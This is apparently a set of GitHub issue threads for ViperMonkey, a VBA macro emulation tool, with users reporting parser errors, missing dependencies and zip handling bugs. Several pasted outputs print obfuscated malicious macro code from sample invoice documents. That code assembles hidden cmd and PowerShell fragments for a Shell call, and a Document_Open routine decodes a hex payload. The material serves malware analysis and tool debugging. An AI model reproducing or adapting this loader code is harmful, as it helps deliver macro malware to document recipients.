TNSWjiaP = aiOcnQhqjSR + Mid(zCrYjz + "WX%SURDEdJuCbofz1YpY2u9WKIu" + LIHjhaal, 3, 8)
qiYnCTXnonU = (6650234 * dGQFKtPFzPYIX * 3668687 - tMMirzUE) + jsB + Sqr(DSdwl) * (ZjdTFlcKNfX / 5468634)
KWmQATG = (8008620 * LoJfPrwI * 288768 - ZRsDCi) + bWotqQtGtOo + Sqr(YdEC) * (BPJwhunQfN / 8886706)
YVnQFbnELSp = (7665032 * ZHitvGBcUYQYW * 5462388 - BcmV) + MBmVnu + Sqr(BcKCwSzph) * (ihzBCjrs / 4990861)
zFnSqfnU = wRGquloVqUiDnt + Mid(QfrPKuvk + "7!UkoPvjkjiLl" + pihVrt, 2, 1)
uHUfWaLlS = (873276 * NKVvcNjJ * 4204314 - IaZuT) + MLYjTCC + Sqr(VbUofFmF) * (BLWBZktR / 4033227)
PWZoMU = (5727599 * BurLDUORZXDL * 1509477 - aAsviQaCDXiwQm) + iPwYOVakJ + Sqr(LqVfzwAODwj) * (VqN / 2478263)
jUhEXF = (9763097 * TcGDbquIFmtd * 9885668 - jKSZFX) + ZhiN + Sqr(riuHLBWjQjfH) * (ilrsNV / 5061358)
dPiDnEDJd = SfPCbZYj + Mid(UNGAizAJ + "nTKwYVpZwKPYqjnGQTj7cICQPvzAw" + RFWmacz, 21, 4)
UTblFLwVobK = (6699033 * XuuzXlHRcjV * 5606564 - miTkTNjNdjpYM) + KDzZCfODw + Sqr(RcSYt) * (uQkmhiTEFA / 513568)
qHGBBWtcJw = (4206139 * NEYKKwNcHSwji * 6388053 - SqvI) + vmZoatc + Sqr(uTBcsJiHsSH) * (jFnzmGwBL / 7292162)
iKNzATa = (2967151 * uCwb * 6100224 - kQUcinQVnZw) + ZYn + Sqr(nqzbCTuaZI) * (whq / 2116055)
cwubjUDHFPX = SQLYnHbmtuXqnw + Mid(NzbrGP + "iIorozdHbGInI7GVwnkTC2lBpQhwdASPzvGz2cY2jqd1t" + DfKKalNhTMmoYN, 26, 6)
GvtUwFc = (4247676 * DZiUnwOqZQqwY * 6978572 - zulAVWO) + NiTcCfWaQUNzwQ + Sqr(dWLMl) * (AVpdocKwQAWpcV / 8085160)
mSUXwRrC = (3863244 * LLCqZbK * 6982015 - ihIdKKc) + Mid + Sqr(OCMdAUqKVuWIDz) * (jFa / 8744179)
RdiNY = (5948515 * TuconqMMbJhqV * 9468246 - pMZHT) + znLzaKJs + Sqr(lPwEuIkpMdizt) * (pShCrusAlKU / 3739894)
BNUpdJiCrzw = bIhqHDXz + Mid(QTZDLMrSOO + "Pq1PDhwdAScjmc%!TPAk1Cq" + cEiQ, 6, 11)
AibILksdw = (520659 * dnkbCTBzzbd * 2545605 - XbRArp) + nHVsNEvH + Sqr(YlVdmnD) * (bwlVNjOwto / 9610607)
bUJUYNcz = (1029959 * HaJjzWSsO * 9530160 - tfYpIjak) + lYsDzaaG + Sqr(UQzCsRLMwpQkn) * (ANchIY / 8079329)
EQKJOjpaC = (1828297 * NhpihF * 6371304 - wLwuhaqm) + iwml + Sqr(nwLspXs) * (iEKDjVC / 6633105)
hjCnA = RoMjDUj + Mid(RrQCAEWN + "kYRset %wnskou0w8dq4G" + pbGCVjsHRw, 4, 5)
CuiihWlEWm = (5672616 * jiqVjZzpXSzOJ * 8612288 - ClzRnKnb) + bLLppFopvujp + Sqr(QLauEzJvfidQOY) * (MpkvDBuYNK / 9991320)
dXiWDMCIKjI = (3379215 * JTOJjFVmr * 8681727 - oRtw) + hYbhHcFKo + Sqr(uWmNjEhflMT) * (hIDuVwi / 1369360)
hrlNpFofr = (7277045 * zvfl * 4634699 - WhNEVzKzzdJ) + GlI + Sqr(JNrTdMGJjjA) * (YqhwfzJDwOz / 6959084)
YSGRiBPXFi = GPSUYoTTnlv + Mid(utW + "Dfcjmc%dXXctruRQncsZoC" + utrWoQJii, 3, 5)
ubHzE = (7263723 * NHUaROVEjzmLE * 2856111 - bqA) + uqLnadmvc + Sqr(rYvb) * (FmkjrMiUHzlP / 704557)
KphurQqMX = (6475487 * vSab * 8335732 - CUuw) + TswobqkNJR + Sqr(KIQLVDqpOjNV) * (ZzUjl / 545551)
phtIA = (3613602 * jNspVTVuipXp * 783280 - RKfj) + dFivFXnPdWAbGw + Sqr(avX) * (zkUujtpj / 1321210)
ICCijHlKu = DvrncAAANmSuEG + Mid(aEYow + "obVVkaojl3qvToGaA4iQnGXTDEdJcICQjS%=^Xp" + aIwKWJbE, 25, 13)
QhdjvXDXn = (3083449 * jzzMwZCJQaik * 662556 - hcVEfY) + EkJWuTqfZBPW + Sqr(CFuLioOhl) * (sCGR / 6371900)
sfcnlZPB = (6351637 * vWrCcMoqBFMd * 8360586 - ONcPbhJW) + KHSiRUoCIwkF + Sqr(fZZsGVjjBEuhd) * (iCFzfZfjvKiW / 4176063)
JwJfnwqPGVS = (2516276 * DfH * 3642795 - iCpibop) + JDXw + Sqr(jKzDzFjOziPK) * (ATjzZnOJGbN / 4487693)
wvBzjlJiQz = fJECEokAR + Mid(SiDsYiNQrCj + "Gao4AsAn%SU8basDEnvOmBnPUKiTRd" + nJjOJKzB, 9, 3)
FJIYKUf = (7050918 * iailfbOwqd * 7354267 - YAKQdwtlc) + XCo + Sqr(fDOzJNBEEPURVD) * (pPFmvAqdEzQk / 9829704)
hHrJHpnF = (921132 * CfzjwKitT * 4669850 - TwvwLbpzn) + SQszoaKztdCz + Sqr(MoToHcGWl) * (TjuhHm / 7858295)
iBDELVW = (8998027 * Qnk * 2888679 - hHkX) + ZuaTTiIrmiVjR + Sqr(CZSusDNEiB) * (qcZOHArjdMT / 8645964)
cqTnAarXPjj = rjYWrmmipC + Mid(AfB + "CGzkV7mP8=p^o^w^er&&set 0YjVL" + FiYZYrnVaMi, 10, 15)
bHwHwGiO = (6082148 * dzoUjjGSsE * 3728582 - WVw) + ZNjsnzO + Sqr(rGTbwtQRWiCmhi) * (wIuAQMRqD / 7412490)
TzQHM = (1577087 * VtnuijqdcM * 6013495 - wnCjrSM) + qkkktzwlZQQ + Sqr(qNuXjjYDrFzm) * (ZBcKlwlaV / 8126448)
nanhNHAz = (7149594 * DBikE * 764722 - wqdlt) + wItJvkkwHT + Sqr(VbnRiOVWJNjhtS) * (BnpmvPjfoqrQ / 5022377)
JHZBdBi = bzzuCMfk + Mid(DMfONsUf + "dfjS%! lf0PGitXQ98YTZtcQsfdMojZDYlEdoR" + MZlcFid, 3, 5)
VYZFQcMzarP = hjCnA + cwubjUDHFPX + YSGRiBPXFi + cqTnAarXPjj + wvBzjlJiQz + JBhYa + ICCijHlKu + wcQNw + BNUpdJiCrzw + zFnSqfnU + TNSWjiaP + dPiDnEDJd + JHZBdBi
FALwijPcQ = (8906322 * cIPjQQa * 37713 - IjzIUXimwwbn) + uRICkwMDKltXKm + Sqr(zPYPrZSWDDbLwc) * (RSiiOzaOjb / 7582016)
ozwDkKkim = (6374213 * LwYcvFzIn * 2826591 - iTatjYCYA) + nDlUXzSQaPpzr + Sqr(iFlC) * (OXoYNTi / 5661827)
riLjOjjXs = (7617592 * XFjs * 2568727 - kicTKanzCmTzfX) + sWb + Sqr(OibTHjqRciP) * (faZdoCKjDY / 6384208)
End Function
-------------------------------------------------------------------------------
PARSING VBA CODE:
INFO parsed Function VYZFQcMzarP (): 57 statement(s)
Module None
Function VYZFQcMzarP (): 57 statement(s)
-------------------------------------------------------------------------------
VBA MACRO WzjunIotaz.bas
in file: invoice.doc - OLE stream: u'Macros/VBA/WzjunIotaz'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):
Function FDQmvuwLDc()
On Error Resume Next
qihDaiEn = (7047872 * NquXDhFbEw * 9498682 - FiOnFXNooYu) + vOmd + Sqr(cRrkmpvUZl) * (kIUinRbX / 8200932)
ZVXZcFfP = (2758950 * jXwtpv * 7729022 - ovcwchFAT) + STflrDjDLSin + Sqr(mQOlUo) * (AzfzzaIMrBhQI / 6625340)
CQmzISULkc = (4572236 * iufsNljVwAjpf * 2704995 - kMaoTninQvTLKl) + fjPWjq + Sqr(wfOPKwzuThdE) * (EhtEHzHPwtaZkl / 4112500)
vPEZqLm = ZzcqzwoihvU + Mid(VUDlOzoEq + "FhdnfhTmrzTrCvMjjYz" + ZhkChCEBTDk, 2, 2)
fJWPAako = (4981530 * bttYvz * 343326 - mSBiQQtTHsUw) + XNPuBWVPI + Sqr(MDVOcjOmGmT) * (UJkQS / 6196445)
RQSqknXa = (6156485 * vWdlEjdduc * 6138981 - ijoauCRk) + GNKIMtGKlEpjd + Sqr(qakKvGkrdGvh) * (UJVPPvmpIScr / 7548023)
dAtBRmZOqoo = (4401616 * IYqoAoz * 166578 - sViIO) + ENfFmAPoaor + Sqr(iHH) * (IjQjEPG / 6189918)
YikpblIf = aJiFvPu + Mid(DdjqWcmhF + "KZVzfZnztboqw eqw & KZPwC" + IzmKOjjZzmnq, 11, 18)
lTLNKRrUJQh = (621617 * jWNZLt * 8566913 - awzq) + AFWLHPK + Sqr(jWlwrZINbVapTi) * (wNDAJUmwt / 7750317)
rWUXjzZBAB = (2269273 * BcuHcsTAAcdT * 3835477 - swcXAARcazE) + BctZrI + Sqr(kGkjOwzAic) * (kkjYbnU / 4399733)
CftcFpX = (7587642 * XYCwC * 2651902 - rGbkVnjdIROZ) + Aiz + Sqr(NUic) * (GFU / 4007731)
IFnoF = WIMXtRdbXOPMhk + Mid(skPAJnO + "IswZuuiqEj /V pUKz" + BaNvrifoHzGPs, 11, 13)
DwhdoGz = (3063456 * TVv * 5029789 - CozrGwWwXl) + jjzWlJYIlA + Sqr(FrSbfTOdb) * (toC / 1736326)
QjDVBsndQ = (7262381 * haZkLth * 1808217 - WtPJzm) + hajGYfSDjuKh + Sqr(vwNzpriMQRMJ) * (LJazT / 5772984)
OowoJIBpQII = (2611933 * HcZf * 9078033 - IVA) + iAWUZf + Sqr(UGEcRI) * (wPUJdjbj / 3764705)
OOdaszmpw = NihjLkFJbB + Mid(PwwvTWFzjLo + "uzKiF jCHHPvYdCWDGoltd" + wjiiOqAV, 6, 2)
PEhjzoHdjIc = (8269887 * aRilBHtnciZiz * 5425269 - KFwzl) + OGbzwLccwKf + Sqr(oYG) * (roNJvDEZKR / 2559708)
VtiBBjqMz = (8606929 * jhFFJLKC * 7749564 - vQK) + UtdLDCfNK + Sqr(cqKCCmhwjGP) * (azfMvbCkR / 8517602)
jMsClcsAOb = (7112101 * jfjFJqqVX * 3561011 - SBIABWzhD) + rTijqG + Sqr(LaU) * (FkSWFbotPuF / 1469005)
nbilQ = oUoUuoaqPBdJ + Mid(qkvkwXJcqUCi + "wBqZ /c dDNwbTWhUvtDO" + iwsQpBjojE, 5, 6)
PpikICFaQfQ = (3810804 * ScJMAZYXaL * 752878 - VId) + IKfzuwwFSLX + Sqr(tGztFoRKAkwSo) * (PTrtnfKjdCcUj / 3939524)
YGqGSjbaMZ = (6186167 * upC * 5873628 - ULJvjqSjY) + NKBidN + Sqr(YrjKczRl) * (zdwp / 1518212)
zkjXzSd = (3078622 * OvHhz * 1262968 - rzFoPKilCqVQ) + vUrOs + Sqr(ctpni) * (zAmn / 4256249)
BKitCoHTFFn = MLnaBNULhM + Mid(LBZTkmKwzrNQp + "Emqjas jjjsjjhAwzMcqHmCJ" + vvInnTmMH, 4, 10)
wwFpN = (1976911 * zGDJVGqjFhNhO * 2754735 - lsjdqonIowzYk) + bMuvYr + Sqr(KlimwDYNoiIVaY) * (ODT / 1350554)
zRdQUzuP = (2326592 * PKVhGSiUSlqWsa * 1308635 - qrk) + vzUrDJ + Sqr(YwrcRfAvaMFsk) * (sWsRwiwwMNbWw / 651791)
VKWzYw = (2965572 * iiwaGWbJYrri * 6192062 - kzAVCdbZEbuc) + iAvizjkibvK + Sqr(VuisHqTPXccV) * (AlOEZVfil / 9468875)
RatBKBIkzu = aRDrKWICbWL + Mid(FTqFOuDtp + "qiNRinZ %C^om^S^p^Ec% QaTwDU" + ivCMXjSJvwj, 8, 18)
osAKzQH = (1749041 * zZPwvUTQTZj * 8648177 - CVXbkER) + vmEBwDad + Sqr(cKZw) * (TRzpFszhztO / 5576844)
IftdIoTua = (8417408 * GbqarNBnLwzRsm * 2608011 - VTXRCFbvwZZOoK) + VMbXfmkijjjG + Sqr(roz) * (TAXuF / 5110210)
vWoFBpaTw = (9407110 * zvb * 3364206 - nzAIcEROiKkl) + hVzXDJaNunmt + Sqr(liXfrJ) * (vwhFvP / 6929290)
RlbniQ = dJuwwHID + Mid(ihishzlaMNBX + "mwwcQUFGRwqcmd uhpo dojDhsnRC" + HwuVdCai, 12, 9)
ZMisRufZ = (8428394 * Iwzkzs * 703571 - EzrZUDVs) + BQwGjWMnZI + Sqr(GwDrzKkPNiQ) * (iUzTjvXjS / 342418)
YSmnvQlsGaP = (9241187 * JvJZZnwXjQP * 1075403 - AZKTGiClpNllCd) + BcUFCRiDAKpah + Sqr(rREsYiVNNMXuA) * (iYnXKEW / 1434034)
vFIBjID = (9361540 * CiRWK * 1701879 - DUszvh) + iuWnOHhIQPVcX + Sqr(PdWkVup) * (RzDEvTZHVmqus / 3120015)
cwnTWnSRw = zlqnIStbAbrR + Mid(asMNONTmrCTb + "FRasjsdiuwWNQaOcqZYzsUKqBnOTTpTUUAVvEwjqjzqVv" + skotcoZ, 4, 7)
Kvmznnos = (3276769 * jOzVSwfjlHLDp * 1386158 - KzhdPKEIRwIY) + uhWuWIEOXOsP + Sqr(zWlXhnSMlq) * (CBkbF / 6530127)
aPAYGq = (4865981 * XqpEl * 3317847 - hCYmipOjLi) + tOUGcIqM + Sqr(UXdIpphrrKSAG) * (FQnwIUoVZsinKp / 3393487)
PRKAl = (2871126 * NZZNJYQztH * 4393495 - APWnPPpoJirD) + wkZBfsZcdFajlw + Sqr(XBOMRjYdMAvab) * (WfiVPKnqv / 2729758)
wVWoLFJ = ispdtNCAhlwo + Mid(WNanEldWkKLN + "WBDbqwuiqwh hiqwoeqwpi pAjXPGsUwaz" + ItjldZzworf, 4, 21)
RzTXzNZj = (5019212 * LWlEjGAwUUBTQ * 8648805 - HiIOLDj) + kjdtiwzKQkDvGj + Sqr(lBTjRwZozISKT) * (sOpcZBYCNWBUJ / 7139600)
dsSiTEQ = (6728435 * zKblX * 2506480 - WRwLsjkLmjQXV) + ThfUio + Sqr(fwonFkLHjhWfWS) * (apjWc / 2023637)
AabjGvEwwH = (2916095 * tNNzidvQoYvr * 3864857 - XmvZE) + wus + Sqr(vHGqoLMmPIvarl) * (inRhGaarPR / 8762218)
NYURdbDri = zMXKvHdSz + Mid(ITimSaH + "iPNBDsQGakjbmEKCzRNvOTWTnDqihDjBqLHEwVU" + BjSzCH, 9, 4)
SztaRks = (6156873 * RzF * 5570731 - KHioEuRwfA) + wQKfzKk + Sqr(qiGfjhrDdYu) * (sSciSjr / 1696428)
KHGpf = (8218208 * WlqE * 9293714 - wAGGMVm) + EcBGMrnakicjoc + Sqr(QSctk) * (VoclX / 981265)
EmlbA = (5613106 * nGXfcdq * 5972344 - wzSvAIcQjVn) + okbCninYVpmK + Sqr(wbEAL) * (WlhjtRQUjAVrjp / 5319771)
EDGOIzX = DGMqwVODWWF + Mid(cMJbMPzvK + "IqcIUqu ioqwu epoqw jdjska dhtnUDZoAswhJoqspGlFsbHHV" + aPjNlXVQrYukJ, 6, 24)
lLRwiGYlEQ = (1887130 * WDSfRZjJ * 5636922 - zdFWNY) + rSMtRjwi + Sqr(IKmFHa) * (twSzZp / 5872079)
RXawiUShElE = (344961 * uwGuvapwK * 1099774 - wdEXVzCQVWXI) + QLYuZwBn + Sqr(SXhqn) * (hVqvBnQ / 3162663)
dkDtXzvuzEI = (8767876 * dcnNjEWphdjCvX * 2312076 - zlL) + pfJiizjcHl + Sqr(ufw) * (VOZiNBsIJkfaSj / 9497696)
jJBjcfU = WvdpvDGPGNHmEj + Mid(QUWREHDi + "hwrIZMkdEpjfAKjPfQr zjijiiPCSDjJ" + XOGYAzCVhzF, 20, 6)
FDQmvuwLDc = RlbniQ + BKitCoHTFFn + cwnTWnSRw + EDGOIzX + NYURdbDri + vPEZqLm + wVWoLFJ + YikpblIf + RatBKBIkzu + OOdaszmpw + IFnoF + nbilQ + jJBjcfU
niFMGwSFi = (6224008 * uivdoXwb * 8085538 - ZGzfzWzzDZNs) + wVpSr + Sqr(DJuwqHJMfvIdrt) * (NYHj / 1819686)
cTHbGJBYz = (1684975 * EEimjiIGYnJTBu * 9203716 - zCkzhliV) + BTrjFlPXwDY + Sqr(GbiPA) * (WSzF / 6290769)
KnBVNLRSW = (1796808 * iLQ * 5097552 - BuwEqXJ) + bBhjdMCkwmjsD + Sqr(BLflCD) * (wXz / 5089518)
End Function
Sub lZFUFoiihGosi(vwsOuUphvwsw As String)
On Error Resume Next
lBTwYvjNf = (3610452 * SWJnswPiCMaXc * 8169533 - uEsVlaRjFq) + DIhJZhCJs + Sqr(KXES) * (nHp / 2261922)
irGsBcVJh = (3712739 * nEz * 3182823 - HwsmsUSzZkhnD) + nKttMkwQjhE + Sqr(UqrTFZoZ) * (qOCSJYISRuhFw / 6166318)
Shell vwsOuUphvwsw, 0
qtKlfwqQL = (6710885 * zcGGiHz * 5855037 - wvqaCMozPmWS) + KAavoIcE + Sqr(DTwJvCMnn) * (bKjvCkiTIs / 272950)
YMCdSFfiS = (8306614 * jWr * 4455404 - sRllbwnrL) + FXLGpULYf + Sqr(wjcz) * (EVrZaNDfHp / 407390)
End Sub
-------------------------------------------------------------------------------
PARSING VBA CODE:
INFO parsed Function FDQmvuwLDc (): 57 statement(s)
INFO parsed Sub lZFUFoiihGosi ([vwsOuUphvwsw as String]): 6 statement(s)
Module None
Sub lZFUFoiihGosi ([vwsOuUphvwsw as String]): 6 statement(s)
Function FDQmvuwLDc (): 57 statement(s)
Traceback (most recent call last):
File "/opt/ViperMonkey-master/vipermonkey/vmonkey.py", line 296, in process_file
for (subfilename, stream_path, form_variables) in vba.extract_form_strings_extended():
AttributeError: 'VBA_Parser' object has no attribute 'extract_form_strings_extended'
Error:Expected end of text exception.
Hi, I love your tool , but got "Expected end of text" exception.
log is here.
PARSING VBA CODE:
INFO parsed Function sarneoolop (): 4 statement(s)
INFO parsed Function zygotosfoot (): 1 statement(s)
INFO parsed Function underfelles (): 1 statement(s)
INFO parsed Sub Workbook_Open (): 1 statement(s)
INFO parsed Function beerlonger (): 2 statement(s)
INFO parsed Function tentengole (): 7 statement(s)
INFO parsed Function herjioolokd (): 1 statement(s)
INFO parsed Function manmandeep (): 3 statement(s)
INFO parsed Function vellageteek (): 1 statement(s)
Module None
Sub Workbook_Open (): 1 statement(s)
Function beerlonger (): 2 statement(s)
Function zygotosfoot (): 1 statement(s)
Function tentengole (): 7 statement(s)
Function herjioolokd (): 1 statement(s)
Function vellageteek (): 1 statement(s)
Function manmandeep (): 3 statement(s)
Function underfelles (): 1 statement(s)
Function sarneoolop (): 4 statement(s)
Function catdogcat()
^
Expected end of text (at char 1879), (line:48, col:1)
TRACING VBA CODE (entrypoint = Auto*):
Recorded Actions:
+--------+------------+-------------+
| Action | Parameters | Description |
+--------+------------+-------------+
+--------+------------+-------------+
and macro is here.
environment is here.
vipermonkey==0.5
pyparsing==2.2.0
oletools==0.52.1
can you help me ?
vb2py
I thought that this parser and converter from vba to python would be handy, I tried it on a very large code base:
https://github.com/reingart/vb2py
http://vb2py.sourceforge.net
vmonkey - prettytable import issue
Issue reported on Twitter:
Think you’ve missed ”import prettytable” in ”ViperMonkey” version 0.05. :)
Just to clarify. I am running the latest version of oletools. Adding “import prettytable” on it’s own line fixed the error I got. No idea why the “from oletools.thirdparty..prettytable” line got ignored. :/
Solution: remove dependency to oletools' thirdparty folder, and import prettytable from its normal location.
unidecode
Awesome project!
A fresh install needed the python library unidecode installed as well. Guessing it should be added to requirements.txt?
vmonkey does not fully support zipped files (-z option)
With the -z option, vmonkey should be able to process files from within a password-protected zip archive. But for now, an error is triggered when parsing document variables or calling xlrd, which expect a plain file:
>vmonkey "New invoice 4M087877.doc.zip" -z infected
_ ___ __ ___ __
| | / (_)___ ___ _____/ |/ /___ ____ / /_____ __ __
| | / / / __ \/ _ \/ ___/ /|_/ / __ \/ __ \/ //_/ _ \/ / / /
| |/ / / /_/ / __/ / / / / / /_/ / / / / ,< / __/ /_/ /
|___/_/ .___/\___/_/ /_/ /_/\____/_/ /_/_/|_|\___/\__, /
/_/ /____/
vmonkey 0.07 - https://github.com/decalage2/ViperMonkey
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/ViperMonkey/issues
===============================================================================
FILE: New invoice 4M087877.doc in New invoice 4M087877.doc.zip
ERROR Reading in metadata failed. [Errno 2] No such file or directory: 'New invoice 4M087877.doc'
ERROR Reading in file as Excel failed. [Errno 2] No such file or directory: 'New invoice 4M087877.doc'
-------------------------------------------------------------------------------
VBA MACRO fqccqJYYpXCuhi.cls
in file: New invoice 4M087877.doc - OLE stream: u'Macros/VBA/fqccqJYYpXCuhi'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[...]
ERROR Cannot read document variables. [Errno 2] No such file or directory: 'New invoice 4M087877.doc'
ERROR Cannot read custom doc properties. [Errno 2] No such file or directory: 'New invoice 4M087877.doc'
ERROR Cannot read document text from New invoice 4M087877.doc. [Errno 2] No such file or directory: 'New invoice 4M087877.doc'
Reproducing 'Sample 2' Results
It'd be great to have a working example that demonstrates the script in action, so I tried reproducing the results shown at http://decalage.info/vba_emulation (Specifically Sample 2, using file with hash a5e14eecf6beb956732790b05df001ce4fe0f001022f75dd1952d529d2eb9c11). Running vmonkey.py -l debug /tmp/a5e14eec_example.doc results in the following error, though:
DEBUG parsed Procedure Call: CreateObject(([JTCKC('64N63S')], {}))
DEBUG saving func decl: 'JTCKC'
Module None
Function JTCKC ([RBMCBAT]): 3 statement(s)
Private Sub Document_Open() 'JbRney0GnDXL catHu8ErP130RtVq lk wR wc
^
Expected end of text (at char 710), (line:15, col:1)
This is the code associated with Document_Open():
Private Sub Document_Open() 'JbRney0GnDXL catHu8ErP130RtVq lk wR wc
't1o8gNLoZEh 2cGUxt f3kWRKvw n5Wmn5 ln6nR
On Error Resume Next: 'HDVURt uKsTaU9F1HLonjXUxJt3lXoBFh5bQs
'k qx h68SLkSpK8Jfd1C73uOnt0af 897
CreateObject (JTCKC("64N63S")): 'T 5p xDV UvmLPjNp 5CcmzcgHlfe laV68rt
'0i4Jf5t HJxqAj iNElR oRCs ONRASv
If Err.Number > 0 Then 'bOtz8ghmjsUkiwuDl a1 6 5848 eRKUx
'mfPpaHuEO brs42Hs nSEJo9aPy xQOXNy
Dim FSGOPS: 'c gvoTbJ AywjkICIyTaEjdu2G6yE 2B8Kkhy
'1NF i4r QMaT s6 P2HDn8UXbKEH6c6n3Ma
FSGOPS = FSGOPS & JTCKC("34A34F4AL36Q39V50B37H33M56T36Y33D42J36P46U48Z37F35L4EQ36V45C54H37M34Z5AF32K30P45U37B34G4CL36T39Y52D36J33O57U36Z42E44J36P35V49Z37E34K4FQ32V30A55F33L32R41W33B35H47M32S34W4DC32H30N55S30X44D41J30O41T46Y32E33J4CP35U37Z53E34J31P58U32B30G44L33S31X4BE33J36O50U33Z34E56J33P35W42A32G44N49S36X37E4FJ33Q36W55B33H31N42S33Y37E48L33Q39V4FA33G35L55R30X44D5AI30O41V46Z30F44K4CQ30W41B51H32N44S57Y32F44K"): 'MtgV8rl3yJoMAqMAlTg8wKADwunaocdL zdkt1As
...It sounds like there's a problem parsing the If Err.Number > 0 Then line, since you don't see a 'parsed ...' statement associated with that line (even though the line associated with the exception is for the overarching function.). Does that sound right?
I tried switching to vbashell.py to use the line parsing mode with the following change:
diff --git a/vipermonkey/vbashell.py b/vipermonkey/vbashell.py
index 06b9288..737d66c 100644
--- a/vipermonkey/vbashell.py
+++ b/vipermonkey/vbashell.py
@@ -82,7 +82,7 @@ def parse(filename=None):
else:
print('Parsing file %r' % filename)
code = open(filename).read()
- vm.add_module(code)
+ vm.add_module2(code)
def eval_expression(e):
print('Evaluating %s' % e)I copied the VB script displayed when running vmonkey.py into it's own text file, and then ran vbashell.py with vbashell.py -p /tmp/vbscript.txt -l debug. There were a few new errors reported, specifically related to the : '<comment> at the end of some of the lines. I was able to fix some of those with the following changes:
diff --git a/vipermonkey/core/__init__.py b/vipermonkey/core/__init__.py
index e01e2d8..f1ba4c5 100644
--- a/vipermonkey/core/__init__.py
+++ b/vipermonkey/core/__init__.py
@@ -208,7 +210,7 @@ class ViperMonkey(object):
line_keywords = line_keywords[1:]
if line_keywords[0] == 'attribute':
l = header_statements_line.parseString(line, parseAll=True)
- elif line_keywords[0] in ('option', 'dim', 'declare'):
+ elif line_keywords[0] in ('option', 'declare'):
log.debug('DECLARATION LINE')
l = declaration_statements_line.parseString(line, parseAll=True)
elif line_keywords[0] == 'sub':
diff --git a/vipermonkey/core/statements.py b/vipermonkey/core/statements.py
index 5e3fe3c..a0e8a8a 100644
--- a/vipermonkey/core/statements.py
+++ b/vipermonkey/core/statements.py
@@ -608,10 +608,10 @@ simple_for_statement.setParseAction(For_Statement)
# for_statement.setParseAction(For_Statement)
# For the line parser:
-for_start = for_clause + Suppress(EOL)
+for_start = for_clause + Suppress(EOS)
for_start.setParseAction(For_Statement)
-for_end = CaselessKeyword("Next").suppress() + Optional(lex_identifier) + Suppress(EOL)
+for_end = CaselessKeyword("Next").suppress() + Optional(lex_identifier) + Suppress(EOS)
# --- WHILE statement -----------------------------------------------------------
@@ -1182,7 +1182,7 @@ on_error_statement.setParseAction(On_Error_Statement)
# simple statement: fits on a single line (excluding for/if/do/etc blocks)
simple_statement = dim_statement | option_statement | (let_statement ^ call_statement ^ label_statement) | exit_for_statement | \
exit_func_statement | redim_statement | goto_statement | on_error_statement
-simple_statements_line <<= simple_statement + ZeroOrMore(Suppress(':') + simple_statement)
+simple_statements_line <<= simple_statement + ZeroOrMore(Suppress(':') + simple_statement) + EOS.suppress()
# statement has to be declared beforehand using Forward(), so here we use
# the "<<=" operator:I'm currently stuck at the following error message, which seems related to the first one:
DEBUG Parsing line 21: If Err.Number > 0 Then 'bOtz8ghmjsUkiwuDl a1 6 5848 eRKUx
DEBUG line_keywords: ['if', 'err.number', "> 0 then 'botz8ghmjsukiwudl a1 6 5848 erkux\n"]
*** PARSING ERROR (3) ***
If Err.Number > 0 Then 'bOtz8ghmjsUkiwuDl a1 6 5848 eRKUx
Anyway, does it seem like I'm on the right track with this? Also, in general, do you have any advice for debugging these parsing issues? Thanks!
Use a better parser
I think that a significant issue with ViperMonkey is that its parser doesn't support many VB features (see #2, #6, #12, #16, and I just ran into an issue myself). Rather than writing a parser "by hand", I suggest to use an existing grammar, eg. this ANTL4 grammar for VB6, and work from there: the parser will simply accept all valid constructs, and it will be up to ViperMonkey to implement them instead.
ViperMonkey not working with Pafish
See https://github.com/joesecurity/pafishmacro latest document is available here https://github.com/joesecurity/pafishmacro/raw/master/Pafish.docm
Using last git version: http://pastebin.com/WQmuKxAZ
Errors: Impossible to sum arguments of different types / Procedure 'Shell$' not found
While trying to analyse
two errors occured:
INFO Eval Params before calling Procedure: Shell$(([PSluscsHX + Chr(34) + BUVwivWCOGU + kRrNpFBYEu + muVjFaKPL + EEvZQVmhC + jkQVUNq + KJsnJq + EMjVc + qwbDQbnFMp + qLJkQ + SiNWTm + wOQjqJd + oWpWEKB + ZjTWZo + zVAEIAZc + HqjIPzsccL + zfbXDIAUCK + WTndRGr + oaFpKQnGph + uMrGThuWao + bDMhWESUDF + KrZDPjYCzwP + vKLVFV + OMsJPFQliiR + rXNTaBYiszK + YBMVcDwYHwP + hsNadAkBWi + jDRAVuUCWHr + DzhwwKmjVGP + kmXRYClNMqM + fwksZhl + WCYWnjw + ZIQdCsXkaW + ZrWSFV + uBzQDUTIr + LrBKZD + lUocPcMN + Gvofkth + LdSvCbDXJ + URtazUKn + NUYpuLm + DhzFi + QTluDIjmk + WqOzYRP + TitqiBiOjAf + zaphP + XSDSjF + QjvwdjDwL + mzvIBbDNuP + fTFir + LaXihUhMuE + mNtilLRO + KnaKDId + vWZCMK + dasMz + oapYEszoBMb + wUNHXolL + wAZKGbNpDNK + iRcJKTkWzK + pFCpNDOk + MKtNjjLa + kwMOiOqRv + YLzklaCjDo, 0], {}))
ERROR Impossible to sum arguments of different types
INFO Calling Procedure: Shell$([0, 0])
ERROR Procedure 'Shell$' not found
Recorded Actions:
+--------+------------+-------------+
| Action | Parameters | Description |
+--------+------------+-------------+
+--------+------------+-------------+
Full debug log attached.
log.txt
MemoryError
ImportError of pyparsing using pypy
Traceback (most recent call last):
File "vmonkey.py", line 88, in
from pyparsing import *
ImportError: No module named pyparsing
Expected end of text - Parse Error
Latest version of vipermonkey. Parse error.
FILE: a91caa415fbc8104d5ce9342334788bc
| | / ()__ ___ / |/ / ____ / /___ __ __
| | / / / __ / _ / / /|/ / __ / __ / /// _ / / / /
| |/ / / // / / / / / / / // / / / / ,< / __/ // /
|// ./_// // //_// ///||___/_, /
// /___/
vmonkey 0.07 - https://github.com/decalage2/ViperMonkey
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/ViperMonkey/issues
===============================================================================
FILE: a91caa415fbc8104d5ce9342334788bc
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
VBA CODE (with long lines collapsed):
Const rcgitgmqmj = 2
Const hctgnzghgt = 1
Const aatdzxfzba = 0
Sub Auto_Open()
Ocbkj12
End Sub
Sub fbbqjtjfsdnzrdatj()
